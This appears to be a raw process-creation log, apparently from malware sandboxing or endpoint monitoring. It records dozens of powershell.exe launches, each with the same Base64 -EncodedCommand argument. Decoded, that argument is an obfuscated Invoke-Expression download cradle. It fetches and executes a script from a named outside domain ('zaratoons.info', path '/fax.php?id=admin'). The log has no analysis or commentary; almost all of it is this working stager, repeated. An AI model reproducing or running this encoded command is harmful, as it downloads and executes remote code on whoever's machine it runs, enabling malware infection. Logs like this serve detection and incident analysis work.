"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
235
2560
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
236
2260
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
237
7356
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
238
7496
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
239
5196
powershell.exe
5012
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
240
7648
powershell.exe
4344
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
241
6884
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
242
8228
powershell.exe
3708
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
243
8268
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
244
8356
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
245
8480
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
246
8608
powershell.exe
4832
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
247
8652
powershell.exe
4428
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
248
8680
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
249
8872
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
250
8924
powershell.exe
4576
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
251
8940
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
252
8988
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
253
9016
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
254
9060
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
255
9124
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
256
5620
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
257
7928
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
258
4996
powershell.exe
3580
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
259
7060
powershell.exe
4524
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
260
8120
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
261
4308
powershell.exe
3732
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
262
8116
powershell.exe
3808
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
263
8804
powershell.exe
3784
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
264
6748
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
265
8000
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
266
7456
powershell.exe
3676
powershell.exe
